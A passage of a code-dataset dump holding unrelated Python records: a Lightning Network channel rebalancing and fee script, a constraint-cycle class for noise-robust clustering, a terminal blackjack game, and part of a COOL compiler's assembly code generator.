\"two\", \"three\"]\nb.query(\n \"one == '02875ac2c27835990ef62e5755c34264b2c39f51a41525adc5e52a7f94b3a19f8b'\"\n).two.apply(lambda x: getAlias(x))\nhops = list(b.iloc[1429])\nr = buildRoute(hops, 100000)\ninvoice = addInvoice(100000, \"test\")\npprint(sendRoute(invoice[\"r_hash\"], r))\n\n\navail_routes = b.query(\n \"one == '02875ac2c27835990ef62e5755c34264b2c39f51a41525adc5e52a7f94b3a19f8b'\"\n).two.apply(lambda x: getAlias(x))\navail_index = avail_routes.index\n\n\n# Get channels and fees\nz = listGetChannelFees()\n# Get low fee destinations with low balance\ny = z.query(\"fee_rate_milli_msat <= 10 and active == True\").sort_values(\n [\"balanced\"], ascending=[1]\n)\n\nlow_fee_fh_pk = list(y[60:73].remote_pubkey)\nlow_fee_lh_pk = list(y[0:12].remote_pubkey)\n\navail_routes = b.query(\"one.isin(@low_fee_fh_pk) and two.isin(@low_fee_lh_pk)\")\navail_index = avail_routes.index\n\n\ninvoice = addInvoice(200000, \"test\")\nfee_sum = 0\nfor h in avail_index:\n hops = list(b.iloc[h])\n try:\n r = buildRoute(hops, 200000)\n if int(r[\"total_fees_msat\"]) / 1000 > 4:\n print(\"FEE TOO HIGH!\")\n continue\n except Exception as e:\n print(f\"build route error: {hops} {h}\")\n continue\n pay = sendRoute(invoice[\"r_hash\"], r)\n # pprint(pay)\n if \"error\" in pay:\n pprint(pay)\n if pay[\"status\"] == \"SUCCEEDED\":\n invoice = addInvoice(200000, \"test\")\n print(\"Success!\\n\")\n fees = float(pay[\"route\"][\"total_fees_msat\"]) / 1000\n print(fees)\n fee_sum += fees\n print(listChannels().query(\"remote_pubkey.isin(@hops)\"))\n for i in hops:\n getAlias(i)\n\n # cont = input('continue?')\n # if not cont.startswith('y'):\n # \tbreak\n\n# Only need to do these once\npk = getMyPK()\nc = listChannels()\n\n# Find channels with higher fee rate than mine\nchans = []\nfor cid in c.chan_id:\n policy = getChanPolicy(cid)\n my_fee_rate = int(policy.query(\"pubkey == @pk\").fee_rate_milli_msat.item())\n their_fee_rate = int(policy.query(\"pubkey != @pk\").fee_rate_milli_msat.item())\n if their_fee_rate > my_fee_rate:\n chans.append(cid)\n\nlistChannels().query(\"chan_id.isin(@chans)\")\n\n\n# Update the channel\ncid = \"\"\ngetChanPolicy(cid)\nupdateChanPolicy(\n chan_point=CID2CP(cid), fee_rate=0.000275, base_fee_msat=300, tld=40, min_htlc=None\n)\ngetChanPolicy(cid)\n\n\n# Check Result\nlistChannels().query(\"chan_id == '683535592764866560'\")\n\nif __name__ == \"__main__\":\n code.interact(local=locals())\n","sub_path":"lnd_pyshell/data_science.py","file_name":"data_science.py","file_ext":"py","file_size_in_byte":15074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"489346839","text":"from collections import defaultdict\n\nfrom noise_robust_cobras.noise_robust.datastructures.constraint import Constraint\nfrom noise_robust_cobras.noise_robust.datastructures.constraint_index import (\n ConstraintIndex,\n)\n\n\nclass Cycle:\n \"\"\"\n A class that represents a valid constraint cycle\n attributes:\n - constraints: a list of constraints the way they appear in the cycle (starts at a random point in the cycle)\n - sorted_constraints: a tuple of constraints that is sorted for __eq__ and __hash__\n - number_of_CLs: the number of CL constraints in this cycle\n \"\"\"\n\n def __init__(self, constraints, composed_from=None, number_of_CLs=None):\n assert Cycle.is_valid_constraint_set_for_cycle(constraints)\n self.constraints = set(constraints)\n self.sorted_constraints = Cycle.sort_constraints(constraints)\n self.composed_from = set(composed_from) if composed_from is not None else {self}\n if number_of_CLs is None:\n self.number_of_CLs = sum(\n 1 for constraint in constraints if constraint.is_CL()\n )\n else:\n self.number_of_CLs = number_of_CLs\n\n @staticmethod\n def compose_multiple_cycles_ordered(cycles):\n composed_cycle = cycles[0]\n for to_compose in cycles[1:]:\n composed_cycle = composed_cycle.compose_with(to_compose)\n if composed_cycle is None:\n break\n return composed_cycle\n\n @staticmethod\n def compose_multiple_cycles(cycles):\n composed_constraints = set(cycles[0].constraints)\n composed_from = set(cycles[0].composed_from)\n for to_compose in cycles[1:]:\n composed_constraints.symmetric_difference_update(to_compose.constraints)\n composed_from.symmetric_difference_update(to_compose.composed_from)\n if not Cycle.is_valid_constraint_set_for_cycle(composed_constraints):\n return None\n return Cycle(composed_constraints, composed_from=composed_from)\n\n @staticmethod\n def make_cycle_from_raw_cons(raw_constraints):\n constraints = Constraint.raw_constraints_to_constraints(raw_constraints)\n return Cycle(constraints)\n\n @staticmethod\n def cycle_from_instances(instances):\n instances = [int(i) for i in instances]\n raw_constraints = list(zip(instances[:-1], instances[1:])) + [\n (instances[0], instances[-1])\n ]\n return Cycle.make_cycle_from_raw_cons(raw_constraints)\n\n @staticmethod\n def cycle_from_instances_constraint_index(instances, constraint_index):\n instances = [int(i) for i in instances]\n raw_constraints = list(zip(instances[:-1], instances[1:])) + [\n (instances[0], instances[-1])\n ]\n return Cycle(constraint_index.instance_tuples_to_constraints(raw_constraints))\n\n @staticmethod\n def is_valid_constraint_set_for_cycle(constraints):\n if len(constraints) == 0:\n return False\n # check if each instance occurs twice\n count = defaultdict(lambda: 0)\n for constraint in constraints:\n count[constraint.i1] += 1\n count[constraint.i2] += 1\n for key, value in count.items():\n if value != 2:\n return False\n\n # check if all constraints are connected\n all_sets = []\n for constraint in constraints:\n found_sets = [\n s for s in all_sets if constraint.i1 in s or constraint.i2 in s\n ]\n if len(found_sets) == 0:\n all_sets.append({constraint.i1, constraint.i2})\n elif len(found_sets) == 1:\n found_sets[0].update(constraint.get_instance_tuple())\n elif len(found_sets) == 2:\n found_sets[0].update(found_sets[1])\n all_sets.remove(found_sets[1])\n return len(all_sets) == 1\n\n def is_valid_cycle(self):\n return Cycle.is_valid_constraint_set_for_cycle(self.constraints)\n\n def get_sorted_constraint_list(self):\n \"\"\"\n\n :return: a list of all constraints in the order by which they appear in the cycle with an arbitrary starting constraints\n \"\"\"\n all_constraints = list(self.constraints)\n start_constraint = all_constraints[0]\n temp_index = ConstraintIndex()\n for constraint in all_constraints[1:]:\n temp_index.add_constraint(constraint)\n\n current_list = [(start_constraint.get_instance_tuple(), start_constraint)]\n current_instance = start_constraint.i2\n while len(temp_index.constraints) > 0:\n matching_constraints = temp_index.find_constraints_for_instance(\n current_instance\n )\n if len(matching_constraints) == 1:\n matching_constraint = list(matching_constraints)[0]\n else:\n raise Exception(\"Not a valid cycle!\")\n\n other_instance = matching_constraint.get_other_instance(current_instance)\n current_list.append(\n ((current_instance, other_instance), matching_constraint)\n )\n current_instance = other_instance\n temp_index.remove_constraint(matching_constraint)\n\n # check if the cycle is complete\n if start_constraint.i1 != current_instance:\n raise Exception(\"Not a valid cycle!\")\n\n return current_list\n\n def compose_with(self, other_cycle):\n if len(self.constraints.intersection(other_cycle.constraints)) == 0:\n return None\n new_constraints = set(self.constraints).symmetric_difference(\n other_cycle.constraints\n )\n if len(new_constraints) == 0:\n return None\n if not Cycle.is_valid_constraint_set_for_cycle(new_constraints):\n return None\n new_cycle = Cycle(\n new_constraints,\n other_cycle.composed_from.symmetric_difference(self.composed_from),\n )\n return new_cycle\n\n def replace_constraint(self, old_constraint, new_constraint):\n assert old_constraint in self.constraints\n new_constraints = set(self.constraints)\n new_constraints.remove(old_constraint)\n new_constraints.add(new_constraint)\n return Cycle(new_constraints)\n\n @staticmethod\n def sort_constraints(constraints):\n return tuple(sorted(constraints))\n\n def is_useful(self):\n return self.number_of_CLs <= 2\n\n def is_inconsistent(self):\n return self.number_of_CLs == 1\n\n def __iter__(self):\n return self.constraints.__iter__()\n\n def __len__(self):\n return len(self.constraints)\n\n def __eq__(self, other):\n if other == None:\n return False\n return self.sorted_constraints == other.sorted_constraints\n\n def __contains__(self, item):\n return item in self.constraints\n\n def __hash__(self):\n return hash(self.sorted_constraints)\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n # return \",\".join([str(constraint) for constraint in self.constraints])\n return \",\".join([str(con) for _, con in self.get_sorted_constraint_list()])\n","sub_path":"noise_robust_cobras/noise_robust/datastructures/cycle.py","file_name":"cycle.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"458999677","text":"import os\nimport sys\nimport random\nimport click\n\n__author__ = \"Andrew Hariri\"\n__email___ = \"hariria@usc.edu\"\n\n# Ascii inpsired by @see https://codereview.stackexchange.com/questions/82103/ascii-fication-of-playing-cards\n\nblackjackASCII = \"\"\"\n$$$$$$$\\ $$\\ $$$$$$\\ $$$$$$\\ $$\\ $$\\ $$$$$\\ $$$$$$\\ $$$$$$\\ $$\\ $$\\ \n$$ __$$\\ $$ | $$ __$$\\ $$ __$$\\ $$ | $$ | \\__$$ |$$ __$$\\ $$ __$$\\ $$ | $$ |\n$$ | $$ |$$ | $$ / $$ |$$ / \\__|$$ |$$ / $$ |$$ / $$ |$$ / \\__|$$ |$$ / \n$$$$$$$\\ |$$ | $$$$$$$$ |$$ | $$$$$ / $$ |$$$$$$$$ |$$ | $$$$$ / \n$$ __$$\\ $$ | $$ __$$ |$$ | $$ $$< $$\\ $$ |$$ __$$ |$$ | $$ $$< \n$$ | $$ |$$ | $$ | $$ |$$ | $$\\ $$ |\\$$\\ $$ | $$ |$$ | $$ |$$ | $$\\ $$ |\\$$\\ \n$$$$$$$ |$$$$$$$$\\ $$ | $$ |\\$$$$$$ |$$ | \\$$\\\\$$$$$$ |$$ | $$ |\\$$$$$$ |$$ | \\$$\\ \n\\_______/ \\________|\\__| \\__| \\______/ \\__| \\__|\\______/ \\__| \\__| \\______/ \\__| \\__|\n\"\"\"\n\nclass Card:\n\n # Constructor for card, takes a value and suit\n def __init__(self, valueAndSuit):\n self.value = valueAndSuit[0:valueAndSuit.find(\":\")]\n self.suit = valueAndSuit[valueAndSuit.find(\":\") + 1:]\n self.largeCard = []\n self.setLargeCard()\n if (self.suit == \"♠\"):\n self.suitString = \"spades\"\n elif (self.suit == \"♦\"):\n self.suitString = \"diamonds\"\n elif (self.suit == \"♥\"):\n self.suitString = \"hearts\"\n else:\n self.suitString = \"clubs\"\n\n # gets the value\n def getValue(self):\n return self.value\n \n # Prints a large version of the card\n def setLargeCard(self):\n self.largeCard.append('┌─────────┐')\n self.largeCard.append(f'│{\"1\" if self.value == \"10\" else \" \"}{\"0\" if self.value == \"10\" else self.value} │') \n self.largeCard.append('│ │')\n self.largeCard.append('│ │')\n self.largeCard.append(f'│ {self.suit} │')\n self.largeCard.append('│ │')\n self.largeCard.append('│ │')\n self.largeCard.append(f'│ {\"1\" if self.value == \"10\" else \" \"}{\"0\" if self.value == \"10\" else self.value} │')\n self.largeCard.append('└─────────┘')\n\n # Prints \n def printLargeCard(self):\n for x in self.largeCard:\n print(x)\n \n # Get numerical value of the card\n def getNumValue(self):\n if (self.value.isnumeric()):\n return int(self.value)\n elif (self.value == \"A\"):\n return 1\n else:\n return 10\n \n # print card as a message\n def printCardString(self):\n print(self.value + \" of \" + self.suitString)\n\n # announce card \n def sayCard(self):\n os.system(f\"say {self.printCardString()}\")\n\n\n# Method to initialize the deck with 52 unique cards\ndef initializeDeck():\n deck = []\n cardValues = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\n suits = ['♠', '♦', '♥', '♣']\n for cardValue in cardValues:\n for suit in suits:\n deck.append(cardValue + \":\" + suit)\n return deck\n\n# Print the deck\ndef printDeck(deck):\n for x in range(0, 9):\n for card in deck:\n print(card.largeCard[x] + \" \", end=\"\")\n print(\"\")\n\n# Print the dealer deck\ndef printDealerDeck(deck):\n for x in range(0, 9):\n index = 0\n while(index != len(deck)):\n if (index == 0):\n print(\"***********\" + \" \", end=\"\")\n else:\n print(deck[index].largeCard[x] + \" \", end=\"\")\n index += 1\n print(\"\")\n\n\n\n# core play logic function\ndef playLogic():\n print(\"hello and welcome to blackjack\")\n while(input(\"press 'q' to quit or any other key to continue: \") != 'q'):\n deck = initializeDeck()\n userHand = []\n userNumAces = 0\n userTotal = 0\n dealerHand = []\n dealerNumAces = 0\n dealerTotal = 0\n print(\"dealing cards...\")\n \n\n # start of round\n for x in range(4):\n randomNumber = random.randint(0, len(deck) - 1)\n card = Card(deck[randomNumber])\n if x % 2 == 0:\n userHand.append(card)\n userTotal += card.getNumValue()\n if card.getValue() == \"A\":\n userNumAces += 1\n else:\n dealerHand.append(card)\n dealerTotal += card.getNumValue()\n if card.getValue() == \"A\":\n dealerNumAces += 1\n del deck[randomNumber]\n \n print(\"--------------------- DEALER'S HAND -----------------------\", end=\"\\n\\n\")\n printDealerDeck(dealerHand)\n print(\"\\n----------------------- YOUR HAND -------------------------\", end=\"\\n\\n\")\n printDeck(userHand)\n\n # stay or hit for user\n while(userTotal < 21):\n if (userTotal == 11 and userNumAces > 0):\n userTotal += 10\n break\n hitOrStay = input(\"would you like to hit or stay? For hit type 'h', for stay type 's': \")\n if (hitOrStay == 's'):\n break\n elif (hitOrStay == 'h'):\n randomNumber = random.randint(0, len(deck))\n card = Card(deck[randomNumber])\n userHand.append(card)\n del deck[randomNumber]\n if card.getValue() == \"A\":\n dealerNumAces += 1\n if (userTotal == 10):\n userTotal += 11\n break\n userTotal += card.getNumValue()\n printDeck(userHand)\n else:\n print(\"your input was incorrectly formatted, please try again...\")\n \n if (userTotal <= 10 and userNumAces > 0):\n userTotal += 10\n userNumAces -= 1\n \n if (userTotal == 21):\n print(\"Congrats, you got 21 perfectly! You win\")\n continue\n\n elif (userTotal > 21):\n print(\"You went bust! Would you like to play again?\")\n \n else:\n print(\"\\n--------------------- DEALER'S HAND -----------------------\", end=\"\\n\\n\")\n # stay or hit for user\n while(dealerTotal < 17):\n randomNumber = random.randint(0, len(deck))\n card = Card(deck[randomNumber])\n dealerHand.append(card)\n del deck[randomNumber]\n if card.getValue() == \"A\":\n dealerNumAces += 1\n if (dealerTotal == 10 ):\n dealerTotal += 11\n dealerTotal += card.getNumValue()\n printDealerDeck(dealerHand)\n if (dealerTotal <= 10 and dealerNumAces > 0):\n dealerNumAces -= 1\n dealerTotal += 10\n if(dealerTotal == 21):\n printDeck(dealerHand)\n print(\"Dealer got 21 and wins\", end=\"\\n\\n\")\n elif (dealerTotal > 21 and userTotal > 21):\n printDeck(dealerHand)\n print(\"you both lose!\")\n elif (dealerTotal > 21 and userTotal <= 21):\n printDeck(dealerHand)\n print(\"You win!\")\n elif (dealerTotal < userTotal):\n printDeck(dealerHand)\n print(\"You win!\")\n elif (dealerTotal > userTotal):\n printDeck(dealerHand)\n print(\"Dealer wins\")\n elif (dealerTotal == userTotal):\n printDeck(dealerHand)\n print(\"You tie\")\n\n \n\n \n \n\n\nif __name__ == \"__main__\":\n print(blackjackASCII)\n # os.system(\"say Hello my name is Andrea!\")\n playLogic()","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"67259043","text":"from .cool_ast import *\nfrom .cool_global import *\nfrom collections import OrderedDict\nfrom operator import itemgetter\nfrom .utilities import *\n\n# %rax accumulator\n# %rdi self object address\n\nclass CGen(object):\n\n def __init__(self, program: 'Program', type_scope: 'Scope'):\n self.program = program\n self.type_scope = type_scope\n\n self.tag = -1\n self.seq = -1\n self.condSeq = -1\n\n self.attrtable = {}\n self.wordsize = 8\n\n self.prototypes = OrderedDict()\n self.dispatchTable = {}\n self.methodList = []\n\n self.param_regs = ['%rdi', '%rsi', '%rdx', '%rcx', '%r8', '%r9']\n self.caller_save = ['%rdx', '%rcx', '%rsi', '%rdi', '%r8', '%r9', '%r10']\n self.callee_save = ['%rbx', '%r12', '%r13', '%r14']\n\n\n self.predefinedClassName = ['Object', 'IO', 'Int', 'String', 'Bool']\n self.rt_defined_methods = ['IO_in_int']\n \n self.inttable = {}\n self.stringtable = {}\n self.str_contenttable = {}\n self.booltable = {}\n self.tagtable = {}\n\n self.initialize()\n self.scope = CGen_scope()\n\n def initialize(self):\n seq = self.genSeqNum()\n self.inttable['0'] = \"int_const\" + str(seq)\n \n self.stringtable[''] = {}\n self.stringtable['']['label'] = \"string_const\" + str(seq)\n self.stringtable['']['content'] = \"string_content\" + str(seq)\n self.str_contenttable[\"string_content\" + str(seq)] = \"\"\n\n\n def genTag(self):\n # generate prime number for class tag\n self.tag += 1\n return self.tag\n\n def genSeqNum(self):\n self.seq += 1\n return self.seq\n\n def genCondSeq(self):\n self.condSeq += 1\n return self.condSeq\n\n\n def genGloDirectives(self):\n\n ret = \"\\n\"\n ret += TAB + \".globl Main_init\" + NEWLINE\n ret += TAB + \".globl Main_protoObj\" + NEWLINE\n ret += TAB + \".globl String_protoObj\" + NEWLINE\n ret += TAB + \".globl Main_main\" + NEWLINE\n ret += NEWLINE\n\n return ret\n\n def getPredeinedClasses(self):\n ObjectClass = Class(\n 'Object',\n [\n FeatureMethodDecl('abort', [], 'Object', None),\n # FeatureMethodDecl('type_name', [], 'String', None),\n FeatureMethodDecl('copy', [], 'SELF_TYPE', None)\n ]\n )\n\n IOClass = Class(\n 'IO',\n [\n FeatureMethodDecl('out_string', [FormalParam('x', 'String')], 'SELF_TYPE', None),\n FeatureMethodDecl('out_int', [FormalParam('x', 'Int')], 'SELF_TYPE', None),\n FeatureMethodDecl('in_string', [], 'String', None),\n FeatureMethodDecl('in_int', [], 'Int', None)\n ],\n 'Object'\n )\n\n IntClass = Class('Int', [FeatureAttribute('value', 'Int', Integer(0))], 'Object')\n\n BoolClass = Class('Bool', [FeatureAttribute('value', 'Bool', Boolean(False))], 'Object')\n\n StringClass = Class(\n 'String',\n [\n FeatureMethodDecl('length', [], 'Int', None),\n FeatureMethodDecl('concat', [FormalParam('s', 'String')], 'String', None),\n FeatureMethodDecl('substr', [FormalParam('i', 'Int'), FormalParam('l', 'Int')], 'String', None),\n FeatureAttribute('size', 'Int', Integer(0)),\n FeatureAttribute('value', 'String', String(\"\"))\n ],\n 'Object'\n )\n\n return [ObjectClass, IOClass, StringClass, IntClass, BoolClass]\n\n def collectGlobalData(self):\n\n attr_start_index = 3\n\n # generate prototype objects\n all_classes = self.getPredeinedClasses() + self.program.classes\n\n for c in all_classes:\n self.attrtable[c.className] = {}\n prototype = []\n \n tag = self.genTag()\n self.tagtable[c.className] = tag\n prototype.append(tag) # tag\n\n attributes = [f for f in c.features if isinstance(f, FeatureAttribute)]\n prototype.append(len(attributes) + attr_start_index) # size\n\n dispatchTab_lab = c.className + UNDERSCORE + DISPATCH_TABLE\n prototype.append(dispatchTab_lab)\n\n\n methodDecls = [f for f in c.features if isinstance(f, FeatureMethodDecl)]\n self.dispatchTable[c.className] = [(c.className, m.methodName) for m in methodDecls] \n\n # initialize attribute all to 0 in the prototype object\n for i, attr in enumerate(attributes):\n prototype.append(0)\n\n self.attrtable[c.className][attr.id] = {}\n self.attrtable[c.className][attr.id]['offset'] = (i + attr_start_index) * self.wordsize\n self.attrtable[c.className][attr.id]['type'] = attr.decType\n \n self.prototypes[c.className] = prototype\n\n for c in all_classes:\n if c.inheritType:\n parentProtObj = self.prototypes[c.inheritType]\n parentAttrs = parentProtObj[attr_start_index :]\n parentMethods = self.dispatchTable[c.inheritType]\n\n protoObj = self.prototypes[c.className]\n protoObjAttrs = protoObj[attr_start_index:]\n self.prototypes[c.className] = protoObj[0:attr_start_index] + parentAttrs + protoObjAttrs\n protoMethods = self.dispatchTable[c.className]\n self.dispatchTable[c.className] = parentMethods + protoMethods\n\n def code_genProtoTable(self):\n ret = \"\"\n\n # generate prototype object\n for className, values in self.prototypes.items():\n value_str = NEWLINE.join([TAB + WORD + TAB + str(v) for v in values])\n ret += NEWLINE + className + UNDERSCORE + PROTOTYPE_SUFFIX + COLON + NEWLINE + value_str + NEWLINE\n\n return ret\n\n def translate_dispatchTable(self):\n # transfer dispatch table so that for each class, its methods map to an associated offset in the list\n for className, methodList in self.dispatchTable.items():\n newvalue = {}\n for index, method in enumerate(methodList):\n definedClassName = method[0]\n methodName = method[1]\n\n if methodName in newvalue:\n newvalue[methodName]['definedClassName'] = definedClassName\n else:\n newvalue[methodName] = {}\n newvalue[methodName]['offset'] = index * self.wordsize\n newvalue[methodName]['definedClassName'] = definedClassName\n\n self.dispatchTable[className] = newvalue\n\n def code_genDispatchTable(self):\n # generate dispatch table\n ret = \"\"\n self.translate_dispatchTable()\n for className, methodInfos in self.dispatchTable.items():\n\n sorted_methodInfos = sorted(methodInfos.items(), key=lambda value: value[1]['offset'])\n\n disp_value = []\n for (methodName, methodInfo) in sorted_methodInfos:\n disp_method_name = str(methodInfo['definedClassName']) + UNDERSCORE + str(methodName)\n if disp_method_name in self.rt_defined_methods:\n disp_method_name = UNDERSCORE + disp_method_name\n\n \n disp_value.append(TAB + WORD + TAB + disp_method_name)\n self.methodList.append(disp_method_name)\n\n value_str = NEWLINE.join(disp_value)\n ret += NEWLINE + className + UNDERSCORE + DISPATCH_TABLE + COLON + NEWLINE + value_str + NEWLINE\n\n return ret\n\n def code_genClassObjTable(self):\n # generate classObj table \n ret = \"\" \n\n all_classnames = [c for c in self.prototypes.keys()]\n classObjs = []\n for className in all_classnames:\n protoLabel = className + UNDERSCORE + PROTOTYPE_SUFFIX\n initLabel = className + UNDERSCORE + INIT\n classObjs.append(protoLabel)\n classObjs.append(initLabel)\n classObjs_str = NEWLINE.join([TAB + WORD + TAB + str(name) for name in classObjs])\n\n ret += NEWLINE + OBJTABLE + COLON + NEWLINE + classObjs_str + NEWLINE\n\n return ret\n\n def code_genIntConsts(self):\n int_consts = []\n\n int_tag = str(self.tagtable['Int'])\n size = '4'\n dispathTable = \"Int_dispatch_table\"\n\n for int_str, label in self.inttable.items():\n\n\n const = [\n TAB + WORD + TAB + int_tag + NEWLINE,\n TAB + WORD + TAB + size + NEWLINE,\n TAB + WORD + TAB + dispathTable + NEWLINE,\n TAB + WORD + TAB + int_str + NEWLINE \n ]\n\n int_consts.append(label + COLON + NEWLINE + \"\".join(const))\n\n return NEWLINE.join(int_consts)\n\n def codeg_genStringConsts(self):\n\n string_consts = []\n string_tag = str(self.tagtable['String'])\n size = '6'\n dispathTable = \"String_dispatch_table\"\n\n for string, info in self.stringtable.items():\n len_const = self.inttable[str(len(string))]\n label = info['label']\n content_label = info['content']\n\n string = '\\\"\\\"' if string == '' else string\n\n const = [\n TAB + WORD + TAB + string_tag + NEWLINE,\n TAB + WORD + TAB + size + NEWLINE,\n TAB + WORD + TAB + dispathTable + NEWLINE,\n TAB + WORD + TAB + len_const + NEWLINE,\n TAB + WORD + TAB + content_label + NEWLINE,\n TAB + ALIGN + TAB + str(self.wordsize) + NEWLINE\n ]\n\n string_consts.append(label + COLON + NEWLINE + \"\".join(const))\n\n return NEWLINE.join(string_consts)\n\n\n def code_genInitValue(self, ty):\n\n ret = \"\"\n\n if ty == \"Int\":\n zero_label = self.inttable['0']\n ret += TAB + \"leaq {}(%rip), %rax\".format(zero_label) + NEWLINE\n # ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n # ret += TAB + \"movq (%rax), %rax\" + NEWLINE\n elif ty == \"String\":\n empty_label = self.stringtable['']['label']\n ret += TAB + \"leaq {}(%rip), %rax\".format(empty_label) + NEWLINE\n # ret += TAB + \"movq {}(%rax), %rax\".format(STRCONST_STROFFSET) + NEWLINE\n elif ty == \"Bool\":\n ret += TAB + \"movq $0, %rax\" + NEWLINE\n \n\n return ret\n\n\n def code_genConstantContent(self):\n\n ret = \"\" + NEWLINE + NEWLINE\n\n for content_label, value in self.str_contenttable.items():\n value = \"\\\"\\\"\" if value == \"\" else value\n ret += content_label + COLON + NEWLINE + \\\n TAB + ASCIZ + TAB + value + NEWLINE + \\\n TAB + ALIGN + TAB + \"8\" + NEWLINE\n\n # for content_label, value in self.int_contenttable.items():\n # ret += content_label + COLON + TAB + WORD + TAB + value + NEWLINE \n\n return ret + NEWLINE\n \n \n\n\n\n#######################################################################################################################\n\n def code_gen(self):\n data_header = \".data\" + NEWLINE\n\n self.collectGlobalData()\n data = self.code_genClassObjTable()\n data += self.code_genProtoTable()\n data += self.code_genDispatchTable()\n\n globl_directives = self.genGloDirectives()\n\n text_header = \".text\" + NEWLINE\n text = self.code_genProgram()\n\n const_content = self.code_genConstantContent() + NEWLINE\n\n data += self.code_genIntConsts() + NEWLINE\n data += self.codeg_genStringConsts() + NEWLINE\n\n return data_header + globl_directives + const_content + data + NEWLINE + text_header + text + NEWLINE\n\n\n def code_genProgram(self):\n\n ret = \"\"\n for c in self.getPredeinedClasses() + self.program.classes:\n ret += NEWLINE + self.code_genClass(c)\n\n return ret\n\n\n def code_genClass(self, c):\n\n ret = \"\"\n self.scope.enterScope()\n\n hasSeenInit = False\n hasAttrbutes = True if self.attrtable[c.className] else False\n\n for feature in c.features:\n if not isinstance(feature, FeatureMethodDecl):\n continue\n \n if feature.methodName == \"init\":\n hasSeenInit = True\n if hasAttrbutes:\n feature = self.addAttrInitToFeature(c, feature)\n\n ret += NEWLINE + self.code_genMethod(c, feature)\n\n if not hasSeenInit and not hasAttrbutes:\n ret += self.gen_emptyInit(c)\n elif not hasSeenInit:\n defaultMethod = self.generateDefaulInit(c)\n ret += self.code_genMethod(c, defaultMethod)\n elif not hasAttrbutes:\n pass\n \n \n return ret\n\n def addAttrInitToFeature(self, c, method):\n attrs = self.getAttributesFromClass(c)\n\n new_body = Block([])\n\n for id, initInfo in attrs.items():\n ty = initInfo[0]\n init = initInfo[1]\n\n if ty == 'String':\n rvalue = init if init else String(\"\")\n elif ty == \"Int\":\n rvalue = init if init else Integer(0)\n elif ty == \"Bool\":\n rvalue = init if init else Boolean(False)\n else:\n rvalue = init if init else Integer(-1)\n\n body.exprs.append(AssignmentExpr(id, rvalue))\n\n new_body.exprs.append(method.bodyExpr)\n method.bodyExpr = new_body\n\n return method\n\n def generateDefaulInit(self, c: 'class'):\n attrs = self.getAttributesFromClass(c)\n body = Block([])\n\n for id, initInfo in attrs.items():\n ty = initInfo[0]\n init = initInfo[1]\n\n if ty == 'String':\n rvalue = init if init else String(\"\")\n elif ty == \"Int\":\n rvalue = init if init else Integer(0)\n elif ty == \"Bool\":\n rvalue = init if init else Boolean(False)\n else:\n rvalue = init if init else Integer(-1)\n\n body.exprs.append(AssignmentExpr(id, rvalue))\n\n return FeatureMethodDecl('init', [], 'Object', body)\n\n\n def gen_emptyInit(self, c: 'Class'):\n ret = self.genMethodEntry()\n\n if c.inheritType:\n ret += self.genFuncCall(c.inheritType + UNDERSCORE + INIT)\n\n ret += self.genMethodExit()\n\n return c.className + UNDERSCORE + INIT + COLON + NEWLINE + ret + NEWLINE\n\n def getAttributesFromClass(self, c):\n return dict([(f.id, (f.decType, f.init)) for f in c.features if isinstance(f, FeatureAttribute)])\n\n def code_genMethod(self, c: 'Class', method):\n if c.className in self.predefinedClassName and method.methodName != 'init':\n return \"\"\n\n # params_offset = {}\n self.scope.enterScope()\n ret = \"\"\n \n if method.methodName == c.className:\n label = c.className + UNDERSCORE + INIT\n else:\n label = c.className + UNDERSCORE + method.methodName\n\n ret += self.genMethodEntry()\n\n if method.methodName == \"init\" and c.inheritType:\n ret += self.genFuncCall(\"{}_init\".format(c.inheritType))\n\n num_params = len(method.formalParams) + 1\n\n # this will be used to calculate the offset of local from base pointer\n num_locals = num_params\n\n stack_size = align(num_params * self.wordsize, ALIGNMENT_SIZE)\n\n ret += TAB + \"subq ${}, %rsp\".format(stack_size) + NEWLINE\n\n if num_params > 0:\n for i in range(num_params):\n if i < 6:\n source_reg = self.param_regs[i]\n target_offset = -(i + 5) * self.wordsize\n ret += TAB + \"movq {}, {}(%rbp)\".format(source_reg, target_offset) + NEWLINE\n else:\n target_offset = -(i + 5) * self.wordsize\n ret += TAB + \"movq {}(%rbp), %rax\".format(i + self.wordsize) + NEWLINE\n ret += TAB + \"movq %rax, {}(%rbp)\".format(target_offset) + NEWLINE\n\n # offset always starts 32 bytes from the base pointer \n # since those 32 bytes are used for storing callee save regs content\n if i == 0 : # self\n self.scope.addId('self', -(i + 5) * self.wordsize, c.className)\n else:\n id = method.formalParams[i - 1].id\n ty = method.formalParams[i - 1].decType\n self.scope.addId(id, -(i + 5) * self.wordsize, ty)\n\n body_code, _ = self.code_genExpr(c, method, num_locals, method.bodyExpr)\n \n ret += body_code\n\n # restore stack\n ret += TAB + \"addq ${}, %rsp\".format(stack_size) + NEWLINE\n\n ret += self.genMethodExit()\n self.scope.existScope()\n\n return label + COLON + NEWLINE + ret + NEWLINE\n\n def code_genExpr(self, c, method, num_locals, expr, isLvalue=False):\n if isinstance(expr, AssignmentExpr):\n return self.code_genAssignment(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Dispatch):\n return self.code_genDispatch(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, String):\n return self.code_genString(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Integer):\n return self.code_genInteger(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, If):\n return self.code_genIf(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Boolean):\n return self.code_genBoolean(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, While):\n return self.code_genWhile(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, BinaryOp):\n return self.code_genBinary(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Not):\n return self.code_genNot(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Self):\n return self.code_genSelf(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Id):\n return self.code_genId(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Block):\n return self.code_genBlock(c, method, num_locals, expr, 